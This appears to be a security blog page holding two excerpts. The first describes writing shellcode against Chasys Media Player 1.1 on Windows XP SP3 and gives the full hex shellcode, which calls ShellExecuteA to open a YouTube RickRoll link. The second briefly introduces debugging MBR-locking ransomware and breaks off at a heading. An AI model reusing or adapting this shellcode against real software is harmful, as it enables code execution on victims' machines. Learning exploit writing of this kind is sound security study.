Writing a RickRoll shellcode

I was sitting in the lab the other day ~socializing~ with other students and we all agreed it was sad that there was no shellcode out there that would open a RickRoll. Making one seemed like a good way to procrastinate from preparing a talk on privacy while learning how to write shellcodes, and the challenge was accepted. The application to have fun with was Chasys Media Player 1.1 on Windows XP SP3, no DEP or ASLR.

TL;DR:

\x89\xE5\x83\xEC\x7F\x83\xEC\x7F\x83\xEC\x06\x31\xC0\x88\x45\x84\x88\x45\x91\x88\x45\xB1\x88\x45\xBD\x88\x45\xCB\x88\x45\xD0\x88\x45\xFB\x89\xEB\x83\xEB\x4E\x53\xFF\x15\x7C\x90\x41\xFF\x89\xEB\x83\xEB\x42\x53\x50\xFF\x15\x24\x91\x41\xFF\x6A\x01\x31\xC9\x51\x51\x89\xEB\x83\xEB\x2F\x53\x89\xEB\x83\xEB\x34\x53\x31\xC9\x51\xFF\xD0\x31\xC9\x51\xFF\x15\xE4\x90\x41\xFF\x53\x68\x65\x6C\x6C\x33\x32\x2E\x64\x6C\x6C\x21\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x41\x21\x6F\x70\x65\x6E\x21\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x76\x3D\x6F\x48\x67\x35\x53\x4A\x59\x52\x48\x41\x30\x21

Debugging MBRLockers on Windows

Ever met MBRLockers? Yes, those nasty pieces of malware which replace your Master Boot Record with malicious code and ransom you. Good news here: most of them just back up your original MBR somewhere and put one asking for ransom in its place. Today I’m going to tell you how to debug these things easily for ehmm, scientific purposes.

Simple MBR Locker
